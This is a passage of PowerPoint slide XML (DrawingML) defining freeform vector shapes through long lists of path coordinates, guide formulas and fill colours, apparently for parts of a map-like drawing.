                      <a:pt x="75" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="621"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36418" name="Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3294" y="2385"/>
                <a:ext cx="69" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 69"/>
                  <a:gd name="T1" fmla="*/ 75 h 77"/>
                  <a:gd name="T2" fmla="*/ 2 w 69"/>
                  <a:gd name="T3" fmla="*/ 72 h 77"/>
                  <a:gd name="T4" fmla="*/ 2 w 69"/>
                  <a:gd name="T5" fmla="*/ 71 h 77"/>
                  <a:gd name="T6" fmla="*/ 0 w 69"/>
                  <a:gd name="T7" fmla="*/ 70 h 77"/>
                  <a:gd name="T8" fmla="*/ 1 w 69"/>
                  <a:gd name="T9" fmla="*/ 68 h 77"/>
                  <a:gd name="T10" fmla="*/ 3 w 69"/>
                  <a:gd name="T11" fmla="*/ 61 h 77"/>
                  <a:gd name="T12" fmla="*/ 3 w 69"/>
                  <a:gd name="T13" fmla="*/ 54 h 77"/>
                  <a:gd name="T14" fmla="*/ 7 w 69"/>
                  <a:gd name="T15" fmla="*/ 45 h 77"/>
                  <a:gd name="T16" fmla="*/ 9 w 69"/>
                  <a:gd name="T17" fmla="*/ 38 h 77"/>
                  <a:gd name="T18" fmla="*/ 9 w 69"/>
                  <a:gd name="T19" fmla="*/ 34 h 77"/>
                  <a:gd name="T20" fmla="*/ 10 w 69"/>
                  <a:gd name="T21" fmla="*/ 32 h 77"/>
                  <a:gd name="T22" fmla="*/ 10 w 69"/>
                  <a:gd name="T23" fmla="*/ 26 h 77"/>
                  <a:gd name="T24" fmla="*/ 10 w 69"/>
                  <a:gd name="T25" fmla="*/ 19 h 77"/>
                  <a:gd name="T26" fmla="*/ 11 w 69"/>
                  <a:gd name="T27" fmla="*/ 17 h 77"/>
                  <a:gd name="T28" fmla="*/ 11 w 69"/>
                  <a:gd name="T29" fmla="*/ 15 h 77"/>
                  <a:gd name="T30" fmla="*/ 11 w 69"/>
                  <a:gd name="T31" fmla="*/ 11 h 77"/>
                  <a:gd name="T32" fmla="*/ 11 w 69"/>
                  <a:gd name="T33" fmla="*/ 10 h 77"/>
                  <a:gd name="T34" fmla="*/ 12 w 69"/>
                  <a:gd name="T35" fmla="*/ 10 h 77"/>
                  <a:gd name="T36" fmla="*/ 25 w 69"/>
                  <a:gd name="T37" fmla="*/ 18 h 77"/>
                  <a:gd name="T38" fmla="*/ 28 w 69"/>
                  <a:gd name="T39" fmla="*/ 20 h 77"/>
                  <a:gd name="T40" fmla="*/ 30 w 69"/>
                  <a:gd name="T41" fmla="*/ 20 h 77"/>
                  <a:gd name="T42" fmla="*/ 38 w 69"/>
                  <a:gd name="T43" fmla="*/ 14 h 77"/>
                  <a:gd name="T44" fmla="*/ 59 w 69"/>
                  <a:gd name="T45" fmla="*/ 1 h 77"/>
                  <a:gd name="T46" fmla="*/ 60 w 69"/>
                  <a:gd name="T47" fmla="*/ 0 h 77"/>
                  <a:gd name="T48" fmla="*/ 66 w 69"/>
                  <a:gd name="T49" fmla="*/ 14 h 77"/>
                  <a:gd name="T50" fmla="*/ 68 w 69"/>
                  <a:gd name="T51" fmla="*/ 20 h 77"/>
                  <a:gd name="T52" fmla="*/ 69 w 69"/>
                  <a:gd name="T53" fmla="*/ 21 h 77"/>
                  <a:gd name="T54" fmla="*/ 66 w 69"/>
                  <a:gd name="T55" fmla="*/ 24 h 77"/>
                  <a:gd name="T56" fmla="*/ 64 w 69"/>
                  <a:gd name="T57" fmla="*/ 26 h 77"/>
                  <a:gd name="T58" fmla="*/ 57 w 69"/>
                  <a:gd name="T59" fmla="*/ 28 h 77"/>
                  <a:gd name="T60" fmla="*/ 39 w 69"/>
                  <a:gd name="T61" fmla="*/ 33 h 77"/>
                  <a:gd name="T62" fmla="*/ 34 w 69"/>
                  <a:gd name="T63" fmla="*/ 35 h 77"/>
                  <a:gd name="T64" fmla="*/ 42 w 69"/>
                  <a:gd name="T65" fmla="*/ 46 h 77"/>
                  <a:gd name="T66" fmla="*/ 47 w 69"/>
                  <a:gd name="T67" fmla="*/ 53 h 77"/>
                  <a:gd name="T68" fmla="*/ 42 w 69"/>
                  <a:gd name="T69" fmla="*/ 59 h 77"/>
                  <a:gd name="T70" fmla="*/ 38 w 69"/>
                  <a:gd name="T71" fmla="*/ 62 h 77"/>
                  <a:gd name="T72" fmla="*/ 37 w 69"/>
                  <a:gd name="T73" fmla="*/ 63 h 77"/>
                  <a:gd name="T74" fmla="*/ 28 w 69"/>
                  <a:gd name="T75" fmla="*/ 66 h 77"/>
                  <a:gd name="T76" fmla="*/ 24 w 69"/>
                  <a:gd name="T77" fmla="*/ 71 h 77"/>
                  <a:gd name="T78" fmla="*/ 18 w 69"/>
                  <a:gd name="T79" fmla="*/ 77 h 77"/>
                  <a:gd name="T80" fmla="*/ 3 w 69"/>
                  <a:gd name="T81" fmla="*/ 75 h 77"/>
                  <a:gd name="T82" fmla="*/ 2 w 69"/>
                  <a:gd name="T83" fmla="*/ 75 h 77"/>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69"/>
                  <a:gd name="T127" fmla="*/ 0 h 77"/>
                  <a:gd name="T128" fmla="*/ 69 w 69"/>
                  <a:gd name="T129" fmla="*/ 77 h 77"/>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69" h="77">
                    <a:moveTo>
                      <a:pt x="2" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36419" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3294" y="2385"/>
                <a:ext cx="69" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 69"/>
                  <a:gd name="T1" fmla="*/ 75 h 77"/>
                  <a:gd name="T2" fmla="*/ 2 w 69"/>
                  <a:gd name="T3" fmla="*/ 72 h 77"/>
                  <a:gd name="T4" fmla="*/ 2 w 69"/>
                  <a:gd name="T5" fmla="*/ 71 h 77"/>
                  <a:gd name="T6" fmla="*/ 0 w 69"/>
                  <a:gd name="T7" fmla="*/ 70 h 77"/>
                  <a:gd name="T8" fmla="*/ 1 w 69"/>
                  <a:gd name="T9" fmla="*/ 68 h 77"/>
                  <a:gd name="T10" fmla="*/ 3 w 69"/>
                  <a:gd name="T11" fmla="*/ 61 h 77"/>
                  <a:gd name="T12" fmla="*/ 3 w 69"/>
                  <a:gd name="T13" fmla="*/ 54 h 77"/>
                  <a:gd name="T14" fmla="*/ 7 w 69"/>
                  <a:gd name="T15" fmla="*/ 45 h 77"/>
                  <a:gd name="T16" fmla="*/ 9 w 69"/>
                  <a:gd name="T17" fmla="*/ 38 h 77"/>
                  <a:gd name="T18" fmla="*/ 9 w 69"/>
                  <a:gd name="T19" fmla="*/ 34 h 77"/>
                  <a:gd name="T20" fmla="*/ 10 w 69"/>
                  <a:gd name="T21" fmla="*/ 32 h 77"/>
                  <a:gd name="T22" fmla="*/ 10 w 69"/>
                  <a:gd name="T23" fmla="*/ 26 h 77"/>
                  <a:gd name="T24" fmla="*/ 10 w 69"/>
                  <a:gd name="T25" fmla="*/ 19 h 77"/>
